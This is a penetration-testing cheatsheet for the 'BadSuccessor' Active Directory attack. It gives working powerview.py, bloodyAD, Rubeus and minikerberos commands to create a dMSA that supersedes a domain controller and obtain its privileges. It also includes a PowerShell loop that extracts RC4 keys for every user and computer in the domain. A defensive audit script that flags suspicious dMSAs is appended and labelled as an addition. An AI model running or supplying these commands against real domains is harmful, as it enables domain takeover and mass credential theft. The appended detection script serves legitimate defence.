BadSuccessor
Abusing dMSA to Escalate Privileges in Active Directory
Enumerate OUs where we can create child objects (using powerview.py or bloodyAD):
PV > Get-DomainObjectAcl -LDAPFilter "(objectClass=organizationalUnit)" -Where "ActiveDirectoryRights contains CreateChild"
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] get writable --otype OU [--right CHILD]
Create a dMSA account with a superseded account in the msDS-ManagedAccountPrecededByLink property (using powerview.py or bloodyAD):
PV > Add-DomainDMSA -Identity mydmsa -PrincipalsAllowedToRetrieveManagedPassword jdoe -SupersededAccount DC01 [-BaseDN "CN=Managed Service Accounts,DC=megacorp,DC=local"]
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] add badSuccessor mydmsa -t "CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local" [--ou "CN=Managed Service Accounts,DC=megacorp,DC=local"]
Ask for a TGT containing the superseded account's PAC (using Rubeus or minikerberos-getDmsa):
Cmd > Rubeus.exe asktgs /targetuser:mydmsa$ /service:krbtgt/megacorp.local /dmsa /opsec /nowrap /ticket:<JDOE_TGT>
$ python3 minikerberos/examples/getDmsa.py 'kerberos+ccache://megacorp.local\jdoe:[email protected]' '[email protected]' --ccache /tmp/mydmsa.ccache
Request a TGT and grep for "previous keys" (from the KERB-DMSA-KEY-PACKAGE structure), which are actually the current RC4 key of the superseded account, for all domain users and computers in a loop (requires this Rubeus):
# $kirbi must already hold the base64 TGT of the principal listed in
# PrincipalsAllowedToRetrieveManagedPassword (jdoe in the example above)
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
# every user and computer object in the domain, with DN and sAMAccountName
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
        + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    # point the dMSA at the next account, then pull the "previous keys" for it from the TGS reply
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
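The same attribute the loop above abuses is also the thing to audit on the blue side. The script below is an added example, not part of the original cheatsheet or of any of the tools it names: it lists every dMSA in the current domain and flags the ones whose msDS-ManagedAccountPrecededByLink points at an AdminSDHolder-protected object or a domain controller, or whose object owner is not one of the admin groups (the creating principal becomes the owner, so a dMSA owned by a regular user was created from a writable OU). It assumes the RSAT ActiveDirectory module and read access to the domain naming context; the list of expected owners is an assumption to adjust per environment.

```powershell
# Added audit script (not from the original page). Flags dMSAs that look like a
# BadSuccessor setup. Assumes the RSAT ActiveDirectory module is available.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$base   = $domain.DistinguishedName

# Objects an attacker would want a dMSA to "succeed": protected accounts and DCs.
$sensitiveDNs = New-Object 'System.Collections.Generic.HashSet[string]' ([StringComparer]::OrdinalIgnoreCase)
Get-ADObject -LDAPFilter '(adminCount=1)' -SearchBase $base |
    ForEach-Object { [void]$sensitiveDNs.Add($_.DistinguishedName) }
Get-ADDomainController -Filter * |
    ForEach-Object { [void]$sensitiveDNs.Add($_.ComputerObjectDN) }

# Owners expected for a legitimately created dMSA (assumption: adjust per environment).
$expectedOwners = @("$($domain.NetBIOSName)\Domain Admins",
                    "$($domain.NetBIOSName)\Enterprise Admins",
                    'BUILTIN\Administrators')

$props = 'msDS-ManagedAccountPrecededByLink', 'nTSecurityDescriptor', 'whenCreated', 'whenChanged'
Get-ADObject -LDAPFilter '(objectClass=msDS-DelegatedManagedServiceAccount)' `
             -SearchBase $base -Properties $props |
ForEach-Object {
    # The attribute is DN-syntax; wrap it so single and multi-valued results look alike.
    $preceded = @($_.'msDS-ManagedAccountPrecededByLink' | Where-Object { $_ })
    $owner    = $_.nTSecurityDescriptor.Owner.Value
    $reasons  = @()
    foreach ($dn in $preceded) {
        if ($sensitiveDNs.Contains($dn)) { $reasons += "precededBy points at sensitive object $dn" }
    }
    if ($owner -and $expectedOwners -notcontains $owner) { $reasons += "owner is $owner" }
    [pscustomobject]@{
        Name       = $_.Name
        DN         = $_.DistinguishedName
        Owner      = $owner
        PrecededBy = ($preceded -join '; ')
        Created    = $_.whenCreated
        Changed    = $_.whenChanged
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
} | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

A dMSA that is rewritten to point at one account after another, as the loop on this page does, shows up as a recently changed object with a sensitive PrecededBy value; pairing this with directory-change auditing on the attribute catches the rewrites themselves.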